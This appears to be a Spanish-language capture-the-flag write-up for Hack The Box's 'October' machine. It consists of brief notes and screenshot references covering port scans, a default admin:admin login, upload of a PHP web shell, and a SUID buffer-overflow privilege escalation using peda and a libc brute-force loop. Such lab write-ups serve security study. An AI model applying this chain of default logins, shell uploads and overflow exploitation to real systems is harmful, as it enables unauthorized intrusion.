nmap -A -p- -oA october 10.129.202.91 --min-rate=10000 --script=vuln --script-timeout=15 -v

Pasted image 20210823133938.png

nmap -sC -sV -O -p- -oA october 10.129.202.91

nmap -sU -O -p- -oA october-udp 10.129.202.91

nikto -h 10.129.202.91:80

Pasted image 20210823134133.png

whatweb 10.129.202.91

Pasted image 20210823134322.png

Pasted image 20210823134453.png

http://10.129.202.91/backend

credenciales admin:admin

Pasted image 20210823134558.png

Subimos archivo shell.php.php5 en media

Pasted image 20210823134941.png

Le damos click a click here

Pasted image 20210823135108.png

Pasted image 20210823174235.png

Vemos ./usr/local/bin/ovrflw

find \-perm -4000 2>/dev/null

Pasted image 20210823174312.png

Pasted image 20210823175048.png

git clone https://github.com/logld/peda

Pasted image 20210823190610.png

tar -zcvf peda.tar peda

Pasted image 20210823190715.png

python3 -m http.server 8888

wget http://10.10.14.125:8888/peda.tar

Pasted image 20210823191154.png

tar -xf peda.tar

Pasted image 20210823191341.png

export HOME=/tmp

echo "source ~/peda/peda.py" >> ~/.gdbinit

Pasted image 20210823191647.png

pattern_create 500

r 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaaAAA'

Pasted image 20210823192751.png

pattern_offset 0x41384141

Pasted image 20210823193210.png

which ovrflw | xargs ldd

Pasted image 20210823194220.png

Creamos un script en python.

Pasted image 20210823210656.png Pasted image 20210823210732.png

for i in $(seq 1000); do ldd /usr/local/bin/ovrflw | grep libc | awk 'NF(print $NF}' | tr -d '()'; done | grep "0xb755a000"

Pasted image 20210823202429.png

Pasted image 20210823203904.png

python3 exploit.py

Pasted image 20210823210540.png

boxes

copyright©2022 Cu3rv0x all rights reserved